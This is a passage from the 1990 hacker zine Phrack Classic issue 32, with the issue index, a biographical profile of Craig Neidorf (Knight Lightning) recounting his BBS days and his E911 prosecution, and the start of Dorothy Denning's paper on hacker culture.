7450 lines
329 KiB
Plaintext
7450 lines
329 KiB
Plaintext
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #1 of XX
|
|
|
|
Phrack Classic Newsletter Issue XXXII Index
|
|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
|
|
|
November 17, 1990
|
|
|
|
Over the past year we have seen MANY changes in the Phreak/Hack community.
|
|
We felt the heat of Operation Sun Devil, watched are friends become public
|
|
scapegoats of the 'hacker world', and watched in anger as the lawyers have
|
|
tried to smash us and put us out like an old cigarette. Almost everyday I
|
|
hear about someone who just got 'busted' for one reason or another. This
|
|
makes me sit back and think. If people go to jail for hacking, and hackers
|
|
know this, then why does it continue? Ahhh... an unsolved mystery. Maybe I
|
|
should call Time Life Books. No, I don't think so.
|
|
Anyways, I am pleased to announce a new era in electronic publications. A
|
|
new age for a new age. Ladies and gentleman (Trumpet Fanfare Added Here),
|
|
Phrack Classic. Phrack Classic takes off where Phrack left off. For those
|
|
of you who have read Phrack then you might remember me as the editor for a
|
|
while. Well, now I am doing Phrack Classic to try to release a newsletter
|
|
that really describes what the Phreak/Hack world is like here in the 1990's.
|
|
People ask me why I am writing a hacker magazine, and they look down on me
|
|
for my attempt. I feel Phrack Classic is written for hackers, yes, but I also
|
|
feel that a hacker is one "who enjoys pushing the envelope, bypassing limits,
|
|
discovering knowledge, inventing solutions, <and> adventuring into uncharted
|
|
areas." So is it so wrong to publish a newsletter for the exchange of free
|
|
information? No, I don't think so.
|
|
Anyone is welcome to submit an article for Phrack Classic, and I encourage
|
|
everyone to do so. I hope you enjoy this issue and I look forward to bringing
|
|
you many more in the not so distant future. Stay safe and be free. See you
|
|
at Ho Ho Con!
|
|
|
|
|
|
Crimson Death
|
|
Editor of Phrack Classic
|
|
|
|
|
|
(Quote taken from the Hackers 6.0 Conference Brochure)
|
|
|
|
|
|
If you have a question, an article submission, or you just wanna say
|
|
hello. Send mail to Crimson Death and Doc Holiday at:
|
|
|
|
|
|
pc@well.uucp
|
|
_______________________________________________________________________________
|
|
|
|
|
|
Table of Contents:
|
|
|
|
1. Phrack Classic XXXII Index by Crimson Death
|
|
2. Phrack Classic Spotlight featuring Knight Lightning by Crimson Death
|
|
3. Concerning Hackers Who Break Into Computer Systems by Dorthy Denning
|
|
4. The Art of Investigation by Butler
|
|
5. Unix 'Nasties' by Sir Hackalot
|
|
6. Automatic Teller Machine Cards by Jester Sluggo
|
|
7. A Trip to the NCSC by Knight Lightning
|
|
8. Inside the SYSUAF.DAT File by Pain Hertz
|
|
9. RSTS by Crimson Death
|
|
10-12. Knight Line I/Parts 1-3 by Doc Holiday
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #2 of 12
|
|
|
|
|
|
==Phrack Classic Spotlight==
|
|
|
|
Knight Lightning
|
|
~~~~~~~~~~~~~~~~
|
|
|
|
Personal
|
|
~~~~~~~
|
|
Handle: Knight Lightning
|
|
Call him: Craig Neidorf
|
|
Past handles: None
|
|
Handle origin: Cross between character "Lightning Lad" from DC Comics'
|
|
Legion of Superheros and Michael Knight from the NBC
|
|
television series "Knight Rider".
|
|
Date of Birth: I doubt you're sending me a birthday card so skip it.
|
|
Age at current date: 21 years old
|
|
Height: 5'10" or so (give or take an inch)
|
|
Weight: 135-140 lbs.
|
|
Eye color: Brown
|
|
Hair Color: Dark Brown
|
|
Computers: Apple IIc (Do you believe this?)
|
|
Co-Sysop of: Metal Shop Private, The Brewery, Quick Shop/Metal Shop
|
|
AE, Whackoland, The Dark Tower, Digital ITS (yay!),
|
|
Stronghold East and probably a few more I've forgotten
|
|
about.
|
|
Net address: C483307@UMCVMB.MISSOURI.EDU (Yes, they actually gave
|
|
C483307@UMCVMB.BITNET me my account back!)
|
|
knight@well.sf.ca.us
|
|
|
|
------------------------------------------------------------------------------
|
|
For several years I had been a die hard fan of video games, both arcade
|
|
and home versions. It was really the Atari 2600 video game Adventure that led
|
|
me into the world of computers and hacking. As many people might know there
|
|
was a secret locked within this game concerning a "magic" dot. It was not
|
|
mentioned in any instruction manuals for the game, but if you could find it and
|
|
bring it to the right place in the game, you could enter a room that didn't
|
|
officially exist. In this room was a message flashing in gold and black. It
|
|
said "Created by Warren Robinet". From that point on I experimented with every
|
|
Atari cartridge I had. I tried screwing around with the connections, the
|
|
components on the system itself, and I attempted bizarre tactics within the
|
|
games, just to see what might happen. During that period of time I found
|
|
several more secretly implanted messages and developed new ways of playing the
|
|
games. Atari played on this idea quite a bit when they created a four game
|
|
saga called Swordquest, but by then the fun was taken out of it because you
|
|
knew already that something was waiting to be found. Eventually I upgraded to
|
|
ColecoVision, but before too long this bored me as well. It is sort of
|
|
interesting to see the new surge of home videogames of Nintendo, NEC, and Sega.
|
|
It makes me wonder if this cycle is permanent.
|
|
I was first introduced to the world of computers by a friend who had a
|
|
Commodore 64. He showed me what bulletin boards were and then took me on a
|
|
tour of the ARPAnet. Later that year, my long-time and best friend, known to
|
|
most of you as Taran King obtained the use of his father's IBM PC. Together we
|
|
explored various bulletin boards in the St. Louis area, always looking for new
|
|
places to visit.
|
|
In August of 1983 I received an Apple IIc as a birthday gift from my
|
|
parents. It was real basic -- no monitor (I had a black and white television
|
|
for that), no extra disk drive, no printer, no joystick, and no modem. Those
|
|
items I would have to earn. So instead of playing with faraway computer
|
|
systems, I was introduced to programming and a community of people who
|
|
considered themselves to be software pirates. These people seemed to be able
|
|
to get software before the companies even began to sell it. However, I was
|
|
content to play games like Ultima III and Wizardry and hack the game itself by
|
|
altering character values. This enabled me to move my characters through
|
|
different places, some of which I never might have realized existed. Later, I
|
|
was able to redesign the game itself to create an endless world of new
|
|
possibilities for intellectual stimulation.
|
|
Finally in March of 1984, my parents purchased me a modem. It was a sad
|
|
little piece of plastic made by Volksmodem, 300 baud and battery operated, but
|
|
it worked and now Knight Lightning was ready to take to the wires. By this
|
|
time I already knew a lot about the bulletin board community through Taran
|
|
King. Even so, it was relatively odd how fast I became co-sysop of the
|
|
ancestor to Metal Shop known as The Dark Tower. TDT was operated by a "hacker"
|
|
with the truly unoriginal name of David Lightman. Before I knew it, I was in
|
|
remote command of his system with full power over user validation and BBS
|
|
maintenance. Although the system went down after about six months, it did
|
|
attract a few out of state users and it was here that my notoriety began. It
|
|
was almost funny, but even as early as then Taran King, Forest Ranger, and I
|
|
became known as the top hacker/phreakers in the St. Louis area. To this day I
|
|
still don't understand why.
|
|
By July of 1985 most of the hacker bulletin boards in St. Louis had
|
|
disappeared, but The Dark Tower program lived again when Taran King created
|
|
Metal Shop: The Dark Tower Phase II. He took the name from a popular
|
|
afternoon rock'n roll program (KSHE FM radio) that centered on heavy metal.
|
|
Both of us had visited systems around the country and we were able to
|
|
effectively advertise MS. At one point we had over 500 registered users so we
|
|
switched to a general password system for security reasons and eventually in
|
|
January of 1986 the board became Metal Shop Private and we cut 4/5ths of the
|
|
users.
|
|
During the late Spring and early Summer of 1985 Taran King and I created
|
|
the 2600 Club. It was just a group name to stick behind our handles since
|
|
everybody was doing it, but it only took use a few months to realize just
|
|
how ignorant hacker groups really are. However, the 2600 Club had one
|
|
great legacy -- it gave birth to Phrack. If you go back and look, you'll
|
|
notice that the first issue of Phrack was a product of the 2600 Club. The idea
|
|
for doing Phrack came from Forest Ranger. Taran King provided the arena and
|
|
would be the editor and I came up with the name.
|
|
When I used to call bulletin boards like the Twilight Zone (sysoped by The
|
|
Marauder) I would data capture the message bases and save them in text files.
|
|
The messages from the hacking subboard would be saved in a file called HACKMESS
|
|
(which stood for hack messages), the messages from the phone phreak subboard
|
|
were saved as PHREAKMESS, but when there was a subboard where both these types
|
|
of messages appeared together, I simply merged the two names and came up with
|
|
PHRACKMESS. Since the newsletter would contain information on both topics and
|
|
more, I felt the name Phrack was applicable. So where did the "Inc." come
|
|
from? Actually it came from another DC Comics series called Infinity Inc.
|
|
Kind of silly now since we never intended to actually incorporate. The first
|
|
issue of Phrack was distributed on November 17, 1985.
|
|
In Phrack issue 2 I began the ongoing series of Phrack World News. I
|
|
followed every story I could and it was fun. The first issue was sort of lame,
|
|
but eventually I learned that PWN was the most popular segment of Phrack. The
|
|
greatest thing about PWN was that it was an original concept for a hacker
|
|
newsletter -- lots of people had tried to write "how-to files, but no one had
|
|
ever tried news before. Who was getting busted? What did they do? How can I
|
|
make sure it doesn't happen to me? Lots of the stories were exaggerated or in
|
|
the case of Oryan QUEST, fabricated (by QUEST himself).
|
|
Outside of Phrack World News I wrote files about Videoconferencing,
|
|
Private Branch eXchanges, and a few others here and there. Prior to Phrack
|
|
I had released a huge glossary of telecommunications terms and files about the
|
|
divestiture of AT&T and its aftermath. Taran King and I also wrote a joke file
|
|
about "Real Phreaks" that was echoed by a continuation of that file in the
|
|
Phrack parody issue number 13 that was released on April 1, 1987.
|
|
Throughout my years I have met many people who call themselves hackers
|
|
and/or phone phreaks:
|
|
|
|
Android Pope - I wonder how married life is treating him.
|
|
Aristotle - Sporty! He is the former editor of the New TAP.
|
|
Bad Subscript - Right hand man to Control C and an expert at disco dancing
|
|
in high speed Camaros.
|
|
Bill from RNOC - How have your phone bills been? High? Have they been!?
|
|
He is also known as "the most dangerous man in New York."
|
|
Beer Wolf - Former sysop of the (Metal Shop) Brewery.
|
|
Blue Buccaneer - Lost track of him over the years.
|
|
Cat Man - How about a nice Hawaiian Punch?
|
|
Cheap Shades - Now a Computer Science graduate of University of
|
|
Missouri-Rolla. Former sysop of Metal Shop AE and
|
|
QuickShop.
|
|
Control C - A man with serious problems right now. Hope you get those
|
|
videotapes and best of luck!
|
|
Crimson Death - The one in 618 NPA. Very un-original name, but definitely
|
|
one of a kind.
|
|
Cryptic Fist - Kinda warm for that leather jacket, isn't it? (90 degrees)
|
|
Cutthroat - So what McDonalds do *you* work at?
|
|
Dan The Operator - An informant for John Maxfield (SummerCon '87).
|
|
Data Line - Now a government agent, but hardly a hacker tracker.
|
|
David Lightman - The sysop of The Dark Tower in 314 NPA.
|
|
The Dictator - Not-so secret agent of Gail Thackeray, the assistant
|
|
Arizona state attorney behind Operation Sun-Devil.
|
|
In a past life, Dale was the creator of Candid Camera.
|
|
What a surprise that was this summer.
|
|
Disk Jockey - I thought he was a great guy until he started to backstab
|
|
me on Lunitic Labs while I was under indictment.
|
|
Doc Holiday (901) - The original!
|
|
Dr. Cypher - Knowledgeable person who remains local.
|
|
Dr. Forbin - Last seen at SummerCon '89.
|
|
Dr. Ripco - Well haven't met him yet, but in a couple of weeks.
|
|
Doom Prophet - A friend who seems to have disappeared.
|
|
Epsilon - Must have lost my number I guess.
|
|
Emmanuel Goldstein - Also known as Eric Corley, the editor of 2600 Magazine.
|
|
Erik Bloodaxe - He is a wildcard... totally unpredictable... hacks by the
|
|
seat of his pants. Still active, but he'd better not have
|
|
a squirt gun next to his bed or he may be sorry.{SS}
|
|
Forest Ranger - The man who introduced me to the hacker elite way back
|
|
when. Former editor of TeleComputist Newsletter.
|
|
Gary Seven - Don't remember much about him. Met him with Lex in Fla.
|
|
Hatchet Molly - You know him as Computer Underground Digest's Gordon
|
|
Meyer. He used a hacker alias to better enable him to
|
|
write his famous thesis.
|
|
Jester Sluggo - A mystery man who is still a legend in the Zantigo
|
|
restroom and a better than average drunk driver.
|
|
Kleptic Wizard - Was he BJ or the Bear?
|
|
Lex Luthor - One time great legend of LOD, now secret BellSouth
|
|
Security (at least until I hear otherwise).
|
|
The Leftist - I wonder what he was going to say about me at my trial.
|
|
He gave me a nod the day they dropped the charges against
|
|
me. The US Attorney's office tells me that he was going
|
|
to claim he learned all he knew about hacking from reading
|
|
Phrack.
|
|
Loki - Lost track of him over the years.
|
|
Lucifer 666 - Lights, Camera, Action!
|
|
The Mad Hacker - Sysop of The Private Connection in 219 NPA.
|
|
Mad Hatter - Still don't know what to make of him, but I wonder if he
|
|
still thinks table salt and baking soda are cocaine.
|
|
The Mentor - Author of GURPS CyberPunk and former sysop of The Phoenix
|
|
Project bulletin board.
|
|
The Noid - Important enough for Southwestern Bell to question me
|
|
about him so important enough to be mentioned here.
|
|
Par - Hans.
|
|
Phantom Phreaker - A friend.
|
|
Phil Phree - Sort of spaced out character and right hand man to The
|
|
Ur-vile.
|
|
Phrozen Ghost - Lost track of him.
|
|
Predat0r - Anarchistic editor of the New TAP.
|
|
The Prophet - Didn't actually "meet" him, but I did see him and hear him
|
|
speak... as a witness for the prosecution at my trial. I
|
|
don't hold a grudge. His testimony helped clear me.
|
|
Rabbit - Franz.
|
|
The Renegade - Thinks he is part of the Illuminati.
|
|
Reverend Enge - Not that religious.
|
|
Sir Francis Drake - A great guy with an odd taste in jewelry. The editor of
|
|
the now defunct WORM. Duck!
|
|
Sir William - Never did hear the whole story of his problems with the
|
|
University of Michigan computing staff.
|
|
Surfer Bob - Lost track of him, but he enjoyed a tan at SummerCon'88.
|
|
Synthetic Slug - Surfs up!
|
|
Taran King - My best friend of over 11 years.
|
|
TWCB Inc. - Two brothers who attempted to resurrect TAP, but failed.
|
|
Tuc - Hey! He's TUC!
|
|
The Ur-Vile - Don't know how I feel about him. He needs a real handle.
|
|
|
|
Some of the memorable bulletin boards I was on include:
|
|
|
|
Alliance - By Phantom Phreaker
|
|
Brainstorm Elite - Where I met Phantom Phreaker and recruited him to Metal
|
|
Shop Private.
|
|
Broadway Show - By Broadway Hacker. Changed its name to The Radio
|
|
Station.
|
|
Catch-22 - By Silver Spy. Only 22 users on this system.
|
|
Chamas - By Terra (Chaos Computer Club) in Germany.
|
|
Dark Tower - By David Lightman 314
|
|
Digital ITS - By Oryan QUEST. BBS Commands were in Spanish.
|
|
DUNE - Secret system imbedded on the Dartmouth University
|
|
mainframe operated remotely by Apollo Phoebus.
|
|
Flying Circus - By Monty Python
|
|
FreeWorld II - By Major Havoc
|
|
Hell Phrozen Over - By the original Crimson Death. Inspiration for the
|
|
first Phrack Pro-Phile.
|
|
Intergalactic Dismantling, Inc. - By Aiken Drum
|
|
Lost City of Atlantis - By The Lineman
|
|
Lunatic Labs UnLtd. - By The Mad Alchemist. Great system!
|
|
Matrix - By Dr. Stangelove
|
|
Metal Shop AE - By Cheap Shades when he lived in St. Louis, Missouri.
|
|
Metal Shop Brewery - By Beer Wolf who now denies that it ever happened.
|
|
Metal Shop Private - Greatest bulletin board of all time.
|
|
MetroMedia - By Dr. Doom. System became Danger Zone Private.
|
|
NetSys - By Terminus. NetSys is now in possession of US Secret
|
|
Service and Terminus' life is in a shambles. They set
|
|
him up and shut him down. You know him as Len Rose.
|
|
Pearly Gates - First real out of state bulletin board that I called.
|
|
It had a secret section of the board for all of the
|
|
really good information. It was operated by Simon
|
|
Templar.
|
|
Phoenix Project - By The Mentor. Great center of learning.
|
|
Phreak Klass 2600 - By The Egyptian Lover. Preceded The Phoenix Project as
|
|
a great center of learning.
|
|
Pipeline - Another early bbs I visited.
|
|
Pirate-80 - A codes board run by Scan Man that has been up for
|
|
almost 10 years. This system was NOT a target in
|
|
Operation Sun-Devil. Odd?
|
|
Private Connection - By The Mad Hacker
|
|
Private Sector - Legendary system.
|
|
QuickShop - By Cheap Shades when he lived in Rolla, Missouri.
|
|
RACS III - By Tuc
|
|
Radio Station - See The Broadway Show.
|
|
Ripco - By Dr. Ripco - Shut down in Operation Sun-Devil, but
|
|
its back up now.
|
|
Septic Tank - By The Safecracker. Second generation of The Twilight
|
|
Zone.
|
|
ShadowSpawn - By Psychic Warlord. Great debate about the use of
|
|
handles and real name/telephone/etc. "We're Not
|
|
*ELITE*, We're Just Cool As Hell!" Taran King thought
|
|
they were elite in the negative sense of the word.
|
|
Great system though.
|
|
Speed Demon Elite - By The Radical Rocker and home base to MetaliBashers,
|
|
Inc.
|
|
Stronghold East Elite - The "real" sysop was Slave Driver, but the board was
|
|
run from the home of The Equalizer.
|
|
Twilight Zone - By The Marauder. Great system for knowledge from my
|
|
early days.
|
|
Zyolog - By Byte Rider in Hawaii.
|
|
|
|
There are probably a few others that I have forgotten to mention. My
|
|
greatest computer learning experiences came from people like Bill From RNOC,
|
|
RNOC, Phantom Phreaker, Forest Ranger, and the authors of the multitude of
|
|
Phrack files and other technical journals.
|
|
In general I see computers as the communications medium of the 21st
|
|
Century so I devoted a lot of time to mastering their use. I do not advocate
|
|
the illegal breaking in to computer systems, but there are certain types of
|
|
information that I feel should be available to everyone equally and not just
|
|
the rich or the well connected.
|
|
Through my experiences on the Internet, I have had legitimate access to
|
|
IBM VM/CMS, Unix, and VAX/VMS systems. For the most part I am content with my
|
|
VM/CMS account, but will accept invitations from system managers to join their
|
|
systems as well.
|
|
With Forest Ranger and Taran King, I organized and attended SummerCon '87,
|
|
SummerCon '88, and SummerCon '89. I did not attend SummerCon '90 since I was
|
|
in Chicago at the time. I helped in organizing and attended PartyCon '87 and
|
|
most recently I appeared and spoke at the 13th Annual National Computer
|
|
Security Conference in Washington D.C.
|
|
I had been a part of TeleComputist Newsletter, which inadvertently led to
|
|
my first real media appearance (Detroit Free Press) and prior to that I was
|
|
helping TWCB Inc. to create a NEW TAP. However, when I learned that they were
|
|
just pulling a fraud, I exposed them. For 5 years I devoted myself to Phrack
|
|
with absolutely no compensation save knowledge and experiences gained.
|
|
|
|
===============================================================================
|
|
|
|
Interests: Racquetball (varsity team in high school and a bookshelf full
|
|
of trophies), Telecommunications, Computers, Music (classic
|
|
rock and pop music... NO RAP!), Fraternity life (well at least
|
|
up until the trustees suspended me for being indicted), Women
|
|
(sexy and smart over just good looks any day), Driving at warp
|
|
speed on the interstate.
|
|
|
|
Craig's Favorite Things
|
|
-----------------------
|
|
Women: I've got it, but don't flaunt it.
|
|
Cars: Ford Mustang, Eagle Talon, Nissan 300 ZX, and Porsche *911* Carrera!
|
|
Foods: No Curry in a hurry-Blecch! American, Italian, Mexican, and Chinese!
|
|
Music: Genesis, Rush, Yes, Chicago, Eagles, Def Leppard, The Police, Styx...
|
|
Leisure: Sleeping, working out, racquetball, writing, computing.
|
|
Alcohol: Bacardi, Smirnoff, Jack Daniels, Pat O'Briens, Hard Rock Cafe.
|
|
|
|
Most Memorable Experiences
|
|
--------------------------
|
|
All of the SummerCons, having an assistant U.S. Attorney lie to my face and
|
|
tell me I wasn't in trouble five days after he went to the grand jury to have
|
|
me indicted, football game with Sluggo in the Zantigo parking lot, road trip to
|
|
Chicago for PartyCon '87, my time in a St. Louis Federal holding facility
|
|
after I turned myself over to the U.S. Federal Marshalls (E911 Incident),
|
|
Taran King and Cheap Shades out of jail when they were caught trashing,
|
|
summer Alliance teleconferences with the PhoneLine Phantoms, the first time I
|
|
heard Frank & The Funny Phone Call, watching Control C bother some girl
|
|
in the airport and then seeing Erik Bloodaxe fall in love with her.
|
|
|
|
|
|
Some Other People To Mention
|
|
----------------------------
|
|
Sheldon Zenner - The greatest attorney practicing today. He turned
|
|
everything around and saved my future from a legal system
|
|
gone awry. Thanks also to Kliebard, Dunlop, Berkowitz,
|
|
and Kaufman.
|
|
|
|
John Perry Barlow - Lyricist for the Grateful Dead and amazing writer, John
|
|
also participated a great deal in generating publicity
|
|
about my case and helped found the Electronic Frontier
|
|
Foundation.
|
|
Dr. Dorothy Denning - A lady who not only helped with my defense, but invited
|
|
me to the 13th Annual National Computer Security
|
|
Conference and is a good friend.
|
|
Peter Denning - Senior editor of the Communications of the ACM and an
|
|
interesting fellow in his own right.
|
|
Scott Ellentuch - Mentioned earlier as Tuc, Scott is the president of the
|
|
Telecom Computer Security Group and a close friend. Tuc
|
|
assisted the defense team by locating the Bellcore public
|
|
catalog and the 911 documents found within. Thanks Tuc!
|
|
Terry Gross - Attorney with Rabinowitz & Boundin in New York City who
|
|
was hired by the EFF to work on court motions dealing
|
|
with the First Amendment.
|
|
Mike Godwin - Don't know Mike very well yet, but he was very outspoken
|
|
in Computer Underground Digest while I was under
|
|
indictment and now he is in-house counsel to the
|
|
Electronic Frontier Foundation.
|
|
Katie Hafner - Author of a book coming soon about Pengo, Kevin Mitnick,
|
|
and Robert Morris, Jr. I met Katie at the NCSConference.
|
|
Steve Jackson - Founder of Steve Jackson Games. I haven't yet had the
|
|
pleasure of meeting Steve, but we may be running into
|
|
each other in the near future.
|
|
Mitch Kapor - Industry wizard and creator of the Lotus 1-2-3 program,
|
|
Mitch is a founding member of the Electronic Frontier
|
|
Foundation that provided legal assistance in my case. I
|
|
hope to meet him face-to-face in the near future.
|
|
Gordon Meyer - Gordon has been a tremendous help with Phrack and a
|
|
friend throughout my entire trial ordeal.
|
|
John Nagle - Inventor who gave technical assistance to my defense team
|
|
and located some very important public documents.
|
|
Marc Rotenberg - Director of the Computer Professionals For Social
|
|
Responsibility in Washington D.C. CPSR is an
|
|
organization lobbying Congress for reforms in the
|
|
Computer Fraud & Abuse Act and other legislation. I hope
|
|
to be working with him in the future.
|
|
Jim Thomas - Creator and editor of Computer Underground Digest, he
|
|
brought the details and evidence in my trial to the
|
|
public eye which helped me gain support.
|
|
Steve Wozniak - Never had any contact with him, but since he had a hand
|
|
in EFF, I thought I would mention him. Incidentally I'm
|
|
ready to upgrade computers if someone has a Macintosh on
|
|
hand.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
David Lightman - The one in 214. See Oryan QUEST.
|
|
Magic Hasan - Totally freaked out when I contacted him this semester. It
|
|
was like he thought I had the plague or something.
|
|
Olorin The White - He couldn't seem to understand that I did not want to join
|
|
his group.
|
|
Oryan QUEST - A hacker who made up news for PWN just to boost his
|
|
reputation. Unleash with full force on this!
|
|
Sally Ride - Also known as Space Cadet, SR co-wrote one of the most
|
|
interesting PWN articles ever printed.
|
|
===============================================================================
|
|
|
|
Private Jokes
|
|
~~~~~~~~~~~~
|
|
There are far too many to go through and most of them have been previously
|
|
written by Taran King in a Phrack Prophile that appeared in issue 20 of Phrack.
|
|
My private jokes shall remain private between those involved or at least until
|
|
I publish a book covering the topic.
|
|
|
|
===============================================================================
|
|
|
|
Phrack is a part of my life that is now over. I hope that Phrack Classic
|
|
which appears to be a second generation Phrack will learn from its predecessor
|
|
and not allow any articles that advocate the illegal entry into computer
|
|
systems. On the other hand, I hope they will continue to bring interesting
|
|
information and news to light every issue.
|
|
For the record, I am not the editor of Phrack Classic. In fact I am not
|
|
even a part of their staff. I would ask that no one send me any articles for
|
|
that publication because they will not be forwarded. I take no responsibility
|
|
for the actions taken by Phrack Classic, but I have faith that they shall stay
|
|
on the path of honesty and integrity.
|
|
I also have a few words to say about some other issues. My case and
|
|
prosecution had absolutely nothing to do with Operation Sun-Devil, with a
|
|
possible exception being the secret video-taping done by the United States
|
|
Secret Service at the Ramada Inn-Westport (Maryland Heights, Missouri) during
|
|
July 22-24, 1988 (i.e., SummerCon '88). Operation Sun-Devil was an attempt to
|
|
crack down on credit card and calling card abusers and NOT hackers. Yes, there
|
|
are some hackers that abuse these items, but the mere abuse of such does not
|
|
make someone a hacker and it is about time that mainstream reporters,
|
|
government agents, and prosecutors began to understand the difference.
|
|
I feel that the abuse of "cards" is very immature and should be met with
|
|
stern punishment. I myself have been the victim of credit card fraud and I can
|
|
tell you that it is not pleasant to open your bill and see expensive charges
|
|
from QVC Home Shopping Network. For the younger readers, it may take them a
|
|
few years to understand this... perhaps when they have credit cards and bills
|
|
of their own to deal with.
|
|
As you may guess there is MUCH MORE to my story especially concerning the
|
|
last 10 issues of Phrack, the Internet, and the E911 incident, but now is not
|
|
the time or the place to tell it. Sometime in the future I hope to assemble
|
|
the tales of all my adventures in the computer underground and publish them in
|
|
a real book.
|
|
Finally, Hackers are *NOT* criminals! Quoting from the brochure for this
|
|
year's Hackers Conference in Saratoga, California, a Hacker is "someone who
|
|
enjoys pushing the envelope, bypassing limits, discovering knowledge, inventing
|
|
solutions, <and> adventuring into uncharted areas."
|
|
|
|
:Craig Neidorf
|
|
|
|
===============================================================================
|
|
|
|
...And now for the regularly taken poll from all interviewees.
|
|
|
|
Of the general population of phreaks you have met, would you consider most
|
|
phreaks, if any, to be computer geeks?
|
|
|
|
"I would not consider most of the hackers or phone phreaks I have met to
|
|
be computer geeks, however over the years I have run into people whose goal in
|
|
life is to pirate every piece of software in existence and of those people I
|
|
feel that a strong percentage are 'geeks'."
|
|
|
|
Thanks for your time, Craig. "No problem."
|
|
|
|
Crimson Death
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #3 of 12
|
|
|
|
Concerning Hackers Who Break into Computer Systems
|
|
|
|
Dorothy E. Denning
|
|
Digital Equipment Corp., Systems Research Center
|
|
130 Lytton Ave., Palo Alto, CA 94301
|
|
415-853-2252, denning@src.dec.com
|
|
|
|
|
|
Abstract
|
|
|
|
A diffuse group of people, often called ``hackers,'' has been
|
|
characterized as unethical, irresponsible, and a serious danger to
|
|
society for actions related to breaking into computer systems. This
|
|
paper attempts to construct a picture of hackers, their concerns,
|
|
and the discourse in which hacking takes place. My initial findings
|
|
suggest that hackers are learners and explorers who want to help
|
|
rather than cause damage, and who often have very high standards
|
|
of behavior. My findings also suggest that the discourse surrounding
|
|
hacking belongs at the very least to the gray areas between larger
|
|
conflicts that we are experiencing at every level of society and
|
|
business in an information age where many are not computer literate.
|
|
These conflicts are between the idea that information cannot be owned
|
|
and the idea that it can, and between law enforcement and the First
|
|
and Fourth Amendments. Hackers have raised serious issues about
|
|
values and practices in an information society. Based on my findings,
|
|
I recommend that we work closely with hackers, and suggest several
|
|
actions that might be taken.
|
|
|
|
|
|
1. Introduction
|
|
|
|
The world is crisscrossed with many different networks that are used
|
|
to deliver essential services and basic necessities -- electric power,
|
|
water, fuel, food, goods, to name a few. These networks are all
|
|
publicly accessible and hence vulnerable to attacks, and yet virtually
|
|
no attacks or disruptions actually occur.
|
|
|
|
The world of computer networking seems to be an anomaly in the
|
|
firmament of networks. Stories about attacks, breakins, disruptions,
|
|
theft of information, modification of files, and the like appear
|
|
frequently in the newspapers. A diffuse group called ``hackers''
|
|
is often the target of scorn and blame for these actions. Why are
|
|
computer networks any different from other vulnerable public networks?
|
|
Is the difference the result of growing pains in a young field?
|
|
Or is it the reflection of deeper tensions in our emerging information
|
|
society?
|
|
|
|
There are no easy or immediate answers to these questions. Yet it
|
|
is important to our future in a networked, information-dependent
|
|
world that we come to grips with them. I am deeply interested in
|
|
them. This paper is my report of what I have discovered in the early
|
|
stages of what promises to be a longer investigation. I have
|
|
concentrated my attention in these early stages on the hackers
|
|
themselves. Who are they? What do they say? What motivates them?
|
|
What are their values? What do that have to say about public policies
|
|
regarding information and computers? What do they have to say about
|
|
computer security?
|
|
|
|
>From such a profile I expect to be able to construct a picture of
|
|
the discourses in which hacking takes place. By a discourse I mean
|
|
the invisible background of assumptions that transcends individuals
|
|
and governs our ways of thinking, speaking, and acting. My initial
|
|
findings lead me to conclude that this discourse belongs at the very
|
|
least to the gray areas between larger conflicts that we are
|
|
experiencing at every level of society and business, the conflict
|
|
between the idea that information cannot be owned and the idea that
|
|
it can, and the conflict between law enforcement and the First and
|
|
Fourth Amendments.
|
|
|
|
But, enough of the philosophy. On with the story!
|
|
|
|
|
|
2. Opening Moves
|
|
|
|
In late fall of 1989, Frank Drake (not his real name), editor of
|
|
the now defunct cyberpunk magazine W.O.R.M., invited me to be
|
|
interviewed for the magazine. In accepting the invitation, I hoped
|
|
that something I might say would discourage hackers from breaking
|
|
into systems. I was also curious about the hacker culture. This
|
|
seemed like a good opportunity to learn about it.
|
|
|
|
The interview was conducted electronically. I quickly discovered
|
|
that I had much more to learn from Drake's questions than to teach.
|
|
For example, he asked: ``Is providing computer security for large
|
|
databases that collect information on us a real service? How do
|
|
you balance the individual's privacy vs. the corporations?'' This
|
|
question surprised me. Nothing that I had read about hackers ever
|
|
suggested that they might care about privacy. He also asked: ``What
|
|
has (the DES) taught us about what the government's (especially NSA's)
|
|
role in cryptography should be?'' Again, I was surprised to discover
|
|
a concern for the role of the government in computer security. I
|
|
did not know at the time that I would later discover considerable
|
|
overlap in the issues discussed by hackers and those of other computer
|
|
professionals.
|
|
|
|
I met with Drake to discuss his questions and views. After our
|
|
meeting, we continued our dialog electronically with me interviewing
|
|
him. This gave me the opportunity to explore his views in greater
|
|
depth. Both interviews appear in ``Computers Under Attack,''
|
|
edited by Peter Denning (DenningP90).
|
|
|
|
My dialog with Drake increased my curiosity about hackers. I read
|
|
articles and books by or about hackers. In addition, I had discussions
|
|
with nine hackers whom I will not mention by name. Their ages ranged
|
|
from 17 to 28.
|
|
|
|
The word ``hacker'' has taken on many different meanings ranging
|
|
from 1) ``a person who enjoys learning the details of computer systems
|
|
and how to stretch their capabilities'' to 2) ``a malicious or
|
|
inquisitive meddler who tries to discover information by poking around
|
|
... possibly by deceptive or illegal means ...'' (Steele83). The
|
|
hackers described in this paper are both learners and explorers who
|
|
sometimes perform illegal actions. However, all of the hackers I
|
|
spoke with said they did not engage in or approve of malicious acts
|
|
that damage systems or files. Thus, this paper is not about malicious
|
|
hackers. Indeed, my research so far suggests that there are very
|
|
few malicious hackers. Neither is this paper about career criminals
|
|
who, for example, defraud businesses, or about people who use stolen
|
|
credit cards to purchase goods. The characteristics of many of the
|
|
hackers I am writing about are summed up in the words of one of the
|
|
hackers: ``A hacker is someone who experiments with systems...
|
|
(Hacking) is playing with systems and making them do what they were
|
|
never intended to do. Breaking in and making free calls is just
|
|
a small part of that. Hacking is also about freedom of speech and
|
|
free access to information -- being able to find out anything. There
|
|
is also the David and Goliath side of it, the underdog vs. the system,
|
|
and the ethic of being a folk hero, albeit a minor one.''
|
|
|
|
Richard Stallman, founder of the Free Software Foundation who calls
|
|
himself a hacker according to the first sense of the word above,
|
|
recommends calling security-breaking hackers ``crackers''
|
|
(Stallman84). While this description may be more accurate, I shall
|
|
